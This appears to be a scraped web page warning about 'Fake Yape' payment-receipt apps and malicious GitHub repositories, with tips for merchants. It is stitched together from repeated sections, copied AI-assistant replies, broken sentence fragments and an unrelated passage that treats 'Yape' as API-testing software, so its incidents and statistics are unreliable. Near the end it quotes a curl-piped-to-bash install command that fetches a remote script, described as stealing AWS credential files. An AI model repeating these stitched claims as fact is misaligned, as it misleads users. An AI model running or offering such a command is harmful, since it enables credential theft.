digital wallet (a popular payment app in Peru) are hosted on to deceive merchants and users What is the "Fake Yape" Scam?
The scam involves a modified application—often distributed as an
—that mimics the visual interface of the official Yape app. Visual Mimicry
: The fake app generates a "payment successful" screen that looks identical to the real one, including animations like the signature "serpentine" confetti. Dynamic Data
: Scammers scan a merchant's real QR code to pull the recipient's name, then manually enter it and any amount into the fake app to create a convincing but fraudulent proof of payment. Zero Funds
: No money is actually moved; the app simply acts as a visual simulator to trick sellers into handing over goods. Why GitHub is Used
GitHub is often exploited in these schemes because it provides a veneer of legitimacy. Hosting APKs : Attackers host the malicious
files in public repositories, sometimes using "fake stars" and fake comments to make the project look popular or trustworthy. Technical Credibility
: Hosting code on a platform for developers can trick victims into thinking they are downloading a "modded" or "enhanced" version of the app for legitimate use, when it is actually a tool for fraud. Detection Evasion
: Scammers frequently rotate repositories or obfuscate the code to avoid being flagged by GitHub's moderation teams. How to Protect Yourself
To avoid falling victim to these scams, follow these security practices:
Fake Yape applications (a popular digital payment app in Peru) are fraudulent tools used by scammers to generate realistic-looking fake payment receipts. ⚠️ Warning Regarding GitHub Links
Violations & Takedowns: Codebases created to generate fake Yape invoices violate GitHub's terms of service. Known repositories, such as those by developers like "acidcoolffc", have been removed by the platform. yape fake github link
Malware Risks: Many unofficial third-party applications distributed via public platforms or unverified sites carry massive security risks, including identity theft, credential harvesting, or malware. 🔍 How the "Fake Yape" Scam Works
Visual Simulation: Scammers use unauthorized web templates or clone apps that perfectly mimic the official Yape interface.
Fake Invoices: They input the merchant's phone number and name to generate a visually identical success receipt.
No Real Funds: They show this screen to business owners or send the fake image over WhatsApp to pretend they paid. No money ever enters the merchant's actual bank account. 🛡️ How to Protect Your Business
Verify Your Balance: Never trust a screenshot or a customer's phone display. Always look directly at the notifications or balance in your own official Yape or bank application.
Do Not Sideload: Avoid downloading custom .apk files or codes promising simulated interfaces. Only use the official app from authorized stores like Google Play and Apple's App Store.
If you are researching this for security or development purposes, please share if you are looking for:
Official API documentation for authorized payment integrations? Cybersecurity case studies regarding digital shoplifting? Methods to spot forged financial images?
I can provide legal and authorized resources based on what you need! AI responses may include mistakes. Learn more
Don’t Be Fooled: The "Fake Yape" Scam and GitHub Phishing Risks If you’re a user of the popular Peruvian digital wallet
, you may have heard about a rising tide of scams designed to trick you out of your hard-earned money. Beyond traditional phishing, a new wave of "fake link" scams—some even hosted or disguised using platforms like GitHub—is targeting unsuspecting users. What is the "Fake Yape" Scam? The "Fake Yape" isn't a single link, but rather a counterfeit application
or interface that mimics the look and feel of the real Yape app by Banco de Crédito del Perú (BCP) . Scammers often use these fake versions to: Generate Fake Proof of Payment digital wallet (a popular payment app in Peru)
: Sellers in marketplaces are often shown a screen that looks identical to a successful Yape transfer notification, but no money ever enters their account. Phish Credentials
: Fake links sent via SMS or WhatsApp lead to login pages designed to steal your Yape or banking credentials. The GitHub Connection: Why Scammers Use It
You might wonder why a "GitHub link" would be involved in a banking scam. Bad actors use GitHub for several deceptive reasons: Borrowing Authority : GitHub is a reputable platform. Seeing github.com
in a link can lower a user's guard compared to a random, sketchy URL. Hosting Malicious Code
: Attackers often host "dual-use" tools or malicious scripts on GitHub that can be used to build phishing pages or automate credential theft. Phishing Repository Confusion
: Scammers create repositories with names similar to popular tools, hoping developers or tech-savvy users will download "fake" versions of legitimate software that contain backdoors. How to Protect Yourself
To avoid falling for "Fake Yape" scams or malicious GitHub phishing links, keep these tips in mind: Trust Your Notifications, Not Screenshots
: If you are a merchant, never rely on a screenshot or the customer's phone screen. Always check your own "Last Movements" (Últimos movimientos)
in your official Yape app to confirm the money has actually arrived. Check the URL
: Before clicking or entering any info, verify the domain. Official GitHub links will always be on github.com gist.github.com
, but remember that just because it is on GitHub doesn't mean the Enable Security Features Two-Factor Authentication (2FA)
on both your banking apps and your GitHub account to prevent unauthorized access even if your password is stolen. Verify Open Source Projects Do not run any downloaded files or commands from the repo
: If you're downloading code from a repository, check the history, the number of contributors, and any open issues that might mention security risks.
For more tips on staying safe with digital payments, you can check out Credicorp’s latest sustainability reports regarding the growth and security of the Yape ecosystem. on GitHub or tips for securing your Yape account Salesforce Commerce Cloud - PayU Latam
It sounds like you’re reporting a fake GitHub link associated with the name "yape" (possibly referring to Yape, the Peruvian digital wallet app).
If you've encountered a suspicious GitHub repository or a phishing link pretending to be related to Yape, here’s what you should do:
In early 2025, a repository named Yape-MultiTool-v2 went viral on Telegram groups. It had a convincing README with screenshots of a Python script "bypassing" the Yape API.
Thousands downloaded the yape_setup.msi file. Within 24 hours, cybersecurity firm ESET reported a 400% spike in BCP credential theft in Peru. The malware was identified as a variant of Lumma Stealer. Victims reported that after running the tool, their Yape accounts were emptied within minutes, and scammers even changed their linked email addresses.
Law enforcement traced the fake GitHub link back to a ring operating out of Callao, but the money—and the GitHub accounts—were long gone.
Issues → New issue → choose Report abuse (or use GitHub’s report form).In the ecosystem of software pirating and "cracking," convenience is often the enemy of security. A recent wave of malware distribution has been observed targeting users searching for software cracks, specifically leveraging the name "Yape" and fake GitHub repositories to infect victims.
If you have been searching for a "Yape crack" or a "Yape activator" and landed on a GitHub link that looks slightly off, you may have been targeted.
Here is everything you need to know about how this scam works and how to protect yourself.
A developer saw a tweet: “Check out Yape – faster than Postman for API testing 🔥 github.com/yape-app/yape”
The repo looked legit. The
READMEsaid:curl -sSL https://raw.githubusercontent.com/yape-app/yape/install.sh | bashThat script downloaded an encrypted binary that stole AWS keys from
~/.aws/credentials.